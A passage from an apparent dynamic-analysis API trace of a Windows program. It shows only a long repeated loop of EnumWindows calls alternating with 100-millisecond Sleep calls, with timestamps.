(lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.008] Sleep (dwMilliseconds=0x64) [0128.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.010] Sleep (dwMilliseconds=0x64) [0128.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.011] Sleep (dwMilliseconds=0x64) [0128.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.013] Sleep (dwMilliseconds=0x64) [0128.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.015] Sleep (dwMilliseconds=0x64) [0128.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.017] Sleep (dwMilliseconds=0x64) [0128.018] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.019] Sleep (dwMilliseconds=0x64) [0128.020] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.021] Sleep (dwMilliseconds=0x64) [0128.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.022] Sleep (dwMilliseconds=0x64) [0128.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.026] Sleep (dwMilliseconds=0x64) [0128.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.028] Sleep (dwMilliseconds=0x64) [0128.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.030] Sleep (dwMilliseconds=0x64) [0128.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.032] Sleep (dwMilliseconds=0x64) [0128.033] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.033] Sleep (dwMilliseconds=0x64) [0128.035] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.035] Sleep (dwMilliseconds=0x64) [0128.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.036] Sleep (dwMilliseconds=0x64) [0128.038] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.038] Sleep (dwMilliseconds=0x64) [0128.040] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.040] Sleep (dwMilliseconds=0x64) [0128.041] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.041] Sleep (dwMilliseconds=0x64) [0128.043] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.043] Sleep (dwMilliseconds=0x64) [0128.044] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.044] Sleep (dwMilliseconds=0x64) [0128.046] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.046] Sleep (dwMilliseconds=0x64) [0128.049] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.049] Sleep (dwMilliseconds=0x64) [0128.051] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.051] Sleep (dwMilliseconds=0x64) [0128.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.052] Sleep (dwMilliseconds=0x64) [0128.054] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.054] Sleep (dwMilliseconds=0x64) [0128.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.056] Sleep (dwMilliseconds=0x64) [0128.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.058] Sleep (dwMilliseconds=0x64) [0128.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.059] Sleep (dwMilliseconds=0x64) [0128.061] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.061] Sleep (dwMilliseconds=0x64) [0128.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.062] Sleep (dwMilliseconds=0x64) [0128.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.064] Sleep (dwMilliseconds=0x64) [0128.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.067] Sleep (dwMilliseconds=0x64) [0128.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.069] Sleep (dwMilliseconds=0x64) [0128.073] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.073] Sleep (dwMilliseconds=0x64) [0128.075] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.075] Sleep (dwMilliseconds=0x64) [0128.085] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.085] Sleep (dwMilliseconds=0x64) [0128.088] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.088] Sleep (dwMilliseconds=0x64) [0128.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.090] Sleep (dwMilliseconds=0x64) [0128.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.092] Sleep (dwMilliseconds=0x64) [0128.096] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.097] Sleep (dwMilliseconds=0x64) [0128.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.098] Sleep (dwMilliseconds=0x64) [0128.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.101] Sleep (dwMilliseconds=0x64) [0128.102] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.102] Sleep (dwMilliseconds=0x64) [0128.104] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.105] Sleep (dwMilliseconds=0x64) [0128.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.185] Sleep (dwMilliseconds=0x64) [0128.187] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.187] Sleep (dwMilliseconds=0x64) [0128.188] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.188] Sleep (dwMilliseconds=0x64) [0128.190] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.190] Sleep (dwMilliseconds=0x64) [0128.192] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.192] Sleep (dwMilliseconds=0x64) [0128.193] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.193] Sleep (dwMilliseconds=0x64) [0128.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.195] Sleep (dwMilliseconds=0x64) [0128.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.197] Sleep (dwMilliseconds=0x64) [0128.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.198] Sleep (dwMilliseconds=0x64) [0128.202] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.202] Sleep (dwMilliseconds=0x64) [0128.234] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.234] Sleep (dwMilliseconds=0x64) [0128.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.294] Sleep (dwMilliseconds=0x64) [0128.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.296] Sleep (dwMilliseconds=0x64) [0128.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.299] Sleep (dwMilliseconds=0x64) [0128.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.300] Sleep (dwMilliseconds=0x64) [0128.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.302] Sleep (dwMilliseconds=0x64) [0128.304] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.304] Sleep (dwMilliseconds=0x64) [0128.306] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.306] Sleep (dwMilliseconds=0x64) [0128.308] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.308] Sleep (dwMilliseconds=0x64) [0128.310] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.310] Sleep (dwMilliseconds=0x64) [0128.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.312] Sleep (dwMilliseconds=0x64) [0128.314] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.314] Sleep (dwMilliseconds=0x64) [0128.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.315] Sleep (dwMilliseconds=0x64) [0128.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.317] Sleep (dwMilliseconds=0x64) [0128.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.319] Sleep (dwMilliseconds=0x64) [0128.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.320] Sleep (dwMilliseconds=0x64) [0128.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.323] Sleep (dwMilliseconds=0x64) [0128.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.325] Sleep (dwMilliseconds=0x64) [0128.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.327] Sleep (dwMilliseconds=0x64) [0128.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.328] Sleep (dwMilliseconds=0x64) [0128.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.330] Sleep (dwMilliseconds=0x64) [0128.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.332] Sleep (dwMilliseconds=0x64) [0128.333] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.333] Sleep (dwMilliseconds=0x64) [0128.335] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.335] Sleep (dwMilliseconds=0x64) [0128.337] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.337] Sleep (dwMilliseconds=0x64) [0128.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.338] Sleep (dwMilliseconds=0x64) [0128.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.340] Sleep (dwMilliseconds=0x64) [0128.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.341] Sleep (dwMilliseconds=0x64) [0128.343] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.344] Sleep (dwMilliseconds=0x64) [0128.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.345] Sleep (dwMilliseconds=0x64) [0128.347] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.347] Sleep (dwMilliseconds=0x64) [0128.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.348] Sleep (dwMilliseconds=0x64) [0128.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.350] Sleep (dwMilliseconds=0x64) [0128.351] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.352] Sleep (dwMilliseconds=0x64) [0128.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.354] Sleep (dwMilliseconds=0x64) [0128.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.358] Sleep (dwMilliseconds=0x64) [0128.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.360] Sleep (dwMilliseconds=0x64) [0128.362] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.362] Sleep (dwMilliseconds=0x64) [0128.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.364] Sleep (dwMilliseconds=0x64) [0128.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.366] Sleep (dwMilliseconds=0x64) [0128.367] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.367] Sleep (dwMilliseconds=0x64) [0128.369] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.369] Sleep (dwMilliseconds=0x64) [0128.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.371] Sleep (dwMilliseconds=0x64) [0128.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.373] Sleep (dwMilliseconds=0x64) [0128.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.375] Sleep (dwMilliseconds=0x64) [0128.376] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.376] Sleep (dwMilliseconds=0x64) [0128.378] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.378] Sleep (dwMilliseconds=0x64) [0128.379] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.380] Sleep (dwMilliseconds=0x64) [0128.381] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.381] Sleep (dwMilliseconds=0x64) [0128.382] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.383] Sleep (dwMilliseconds=0x64) [0128.384] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.384] Sleep (dwMilliseconds=0x64) [0128.386] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.386] Sleep (dwMilliseconds=0x64) [0128.387] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.388] Sleep (dwMilliseconds=0x64) [0128.390] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.390] Sleep (dwMilliseconds=0x64) [0128.392] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.392] Sleep (dwMilliseconds=0x64) [0128.393] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.394] Sleep (dwMilliseconds=0x64) [0128.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.439] Sleep (dwMilliseconds=0x64) [0128.440] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.440] Sleep (dwMilliseconds=0x64) [0128.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.442] Sleep (dwMilliseconds=0x64) [0128.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.444] Sleep (dwMilliseconds=0x64) [0128.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.445] Sleep (dwMilliseconds=0x64) [0128.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.447] Sleep (dwMilliseconds=0x64) [0128.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.448] Sleep (dwMilliseconds=0x64) [0128.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.450] Sleep (dwMilliseconds=0x64) [0128.452] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.452] Sleep (dwMilliseconds=0x64) [0128.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.454] Sleep (dwMilliseconds=0x64) [0128.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.455] Sleep (dwMilliseconds=0x64) [0128.457] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.457] Sleep (dwMilliseconds=0x64) [0128.464] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.464] Sleep (dwMilliseconds=0x64) [0128.465] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.465] Sleep (dwMilliseconds=0x64) [0128.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.467] Sleep (dwMilliseconds=0x64) [0128.468] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.469] Sleep (dwMilliseconds=0x64) [0128.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.470] Sleep (dwMilliseconds=0x64) [0128.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.472] Sleep (dwMilliseconds=0x64) [0128.474] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.475] Sleep (dwMilliseconds=0x64) [0128.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.476] Sleep (dwMilliseconds=0x64) [0128.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.478] Sleep (dwMilliseconds=0x64) [0128.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.480] Sleep (dwMilliseconds=0x64) [0128.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.482] Sleep (dwMilliseconds=0x64) [0128.483] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.483] Sleep (dwMilliseconds=0x64) [0128.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.485] Sleep (dwMilliseconds=0x64) [0128.487] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.487] Sleep (dwMilliseconds=0x64) [0128.489] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.489] Sleep (dwMilliseconds=0x64) [0128.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.491] Sleep (dwMilliseconds=0x64) [0128.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.492] Sleep (dwMilliseconds=0x64) [0128.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.494] Sleep (dwMilliseconds=0x64) [0128.495] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.496] Sleep (dwMilliseconds=0x64) [0128.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.500] Sleep (dwMilliseconds=0x64) [0128.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.502] Sleep (dwMilliseconds=0x64) [0128.503] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.503] Sleep (dwMilliseconds=0x64) [0128.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.505] Sleep (dwMilliseconds=0x64) [0128.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.507] Sleep (dwMilliseconds=0x64) [0128.508] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.508] Sleep (dwMilliseconds=0x64) [0128.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.511] Sleep (dwMilliseconds=0x64) [0128.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.512] Sleep (dwMilliseconds=0x64) [0128.514] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.514] Sleep (dwMilliseconds=0x64) [0128.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.515] Sleep (dwMilliseconds=0x64) [0128.517] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.517] Sleep (dwMilliseconds=0x64) [0128.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.518] Sleep (dwMilliseconds=0x64) [0128.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.520] Sleep (dwMilliseconds=0x64) [0128.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.521] Sleep (dwMilliseconds=0x64) [0128.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.523] Sleep (dwMilliseconds=0x64) [0128.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.524] Sleep (dwMilliseconds=0x64) [0128.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.526] Sleep (dwMilliseconds=0x64) [0128.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.527] Sleep (dwMilliseconds=0x64) [0128.529] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.529] Sleep (dwMilliseconds=0x64) [0128.530] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.530] Sleep (dwMilliseconds=0x64) [0128.532] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.532] Sleep (dwMilliseconds=0x64) [0128.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.533] Sleep (dwMilliseconds=0x64) [0128.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.535] Sleep (dwMilliseconds=0x64) [0128.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.536] Sleep (dwMilliseconds=0x64) [0128.538] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.539] Sleep (dwMilliseconds=0x64) [0128.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.541] Sleep (dwMilliseconds=0x64) [0128.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.542] Sleep (dwMilliseconds=0x64) [0128.544] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.544] Sleep (dwMilliseconds=0x64) [0128.545] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.545] Sleep (dwMilliseconds=0x64) [0128.547] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.547] Sleep (dwMilliseconds=0x64) [0128.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.548] Sleep (dwMilliseconds=0x64) [0128.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.550] Sleep (dwMilliseconds=0x64) [0128.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.551] Sleep (dwMilliseconds=0x64) [0128.553] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.553] Sleep (dwMilliseconds=0x64) [0128.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.554] Sleep (dwMilliseconds=0x64) [0128.556] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.556] Sleep (dwMilliseconds=0x64) [0128.557] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.557] Sleep (dwMilliseconds=0x64) [0128.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.559] Sleep (dwMilliseconds=0x64) [0128.560] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.560] Sleep (dwMilliseconds=0x64) [0128.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.562] Sleep (dwMilliseconds=0x64) [0128.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.563] Sleep (dwMilliseconds=0x64) [0128.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.565] Sleep (dwMilliseconds=0x64) [0128.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.566] Sleep (dwMilliseconds=0x64) [0128.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.568] Sleep (dwMilliseconds=0x64) [0128.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.570] Sleep (dwMilliseconds=0x64) [0128.571] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.571] Sleep (dwMilliseconds=0x64) [0128.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.573] Sleep (dwMilliseconds=0x64) [0128.575] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.575] Sleep (dwMilliseconds=0x64) [0128.584] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.584] Sleep (dwMilliseconds=0x64) [0128.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.585] Sleep (dwMilliseconds=0x64) [0128.587] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.587] Sleep (dwMilliseconds=0x64) [0128.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.588] Sleep (dwMilliseconds=0x64) [0128.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.590] Sleep (dwMilliseconds=0x64) [0128.591] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.591] Sleep (dwMilliseconds=0x64) [0128.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.593] Sleep (dwMilliseconds=0x64) [0128.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.594] Sleep (dwMilliseconds=0x64) [0128.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.596] Sleep (dwMilliseconds=0x64) [0128.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.598] Sleep (dwMilliseconds=0x64) [0128.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.599] Sleep (dwMilliseconds=0x64) [0128.601] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.601] Sleep (dwMilliseconds=0x64) [0128.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.602] Sleep (dwMilliseconds=0x64) [0128.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.604] Sleep (dwMilliseconds=0x64) [0128.605] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.605] Sleep (dwMilliseconds=0x64) [0128.607] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.607] Sleep (dwMilliseconds=0x64) [0128.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.609] Sleep (dwMilliseconds=0x64) [0128.610] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.610] Sleep (dwMilliseconds=0x64) [0128.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.612] Sleep (dwMilliseconds=0x64) [0128.613] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.613] Sleep (dwMilliseconds=0x64) [0128.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.615] Sleep (dwMilliseconds=0x64) [0128.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.617] Sleep (dwMilliseconds=0x64) [0128.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.620] Sleep (dwMilliseconds=0x64) [0128.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.622] Sleep (dwMilliseconds=0x64) [0128.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.623] Sleep (dwMilliseconds=0x64) [0128.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.625] Sleep (dwMilliseconds=0x64) [0128.627] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.627] Sleep (dwMilliseconds=0x64) [0128.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.629] Sleep (dwMilliseconds=0x64) [0128.630] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.630] Sleep (dwMilliseconds=0x64) [0128.632] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.632] Sleep (dwMilliseconds=0x64) [0128.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.633] Sleep (dwMilliseconds=0x64) [0128.635] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.635] Sleep (dwMilliseconds=0x64) [0128.637] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.637] Sleep (dwMilliseconds=0x64) [0128.638] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.638] Sleep (dwMilliseconds=0x64) [0128.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.640] Sleep (dwMilliseconds=0x64) [0128.641] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.641] Sleep (dwMilliseconds=0x64) [0128.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.644] Sleep (dwMilliseconds=0x64) [0128.645] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.645] Sleep (dwMilliseconds=0x64) [0128.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.647] Sleep (dwMilliseconds=0x64) [0128.649] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.649] Sleep (dwMilliseconds=0x64) [0128.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.650] Sleep (dwMilliseconds=0x64) [0128.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.652] Sleep (dwMilliseconds=0x64) [0128.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.654] Sleep (dwMilliseconds=0x64) [0128.655] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.655] Sleep (dwMilliseconds=0x64) [0128.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.657] Sleep (dwMilliseconds=0x64) [0128.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.659] Sleep (dwMilliseconds=0x64) [0128.664] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.665] Sleep (dwMilliseconds=0x64) [0128.667] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.667] Sleep (dwMilliseconds=0x64) [0128.696] EnumWindows 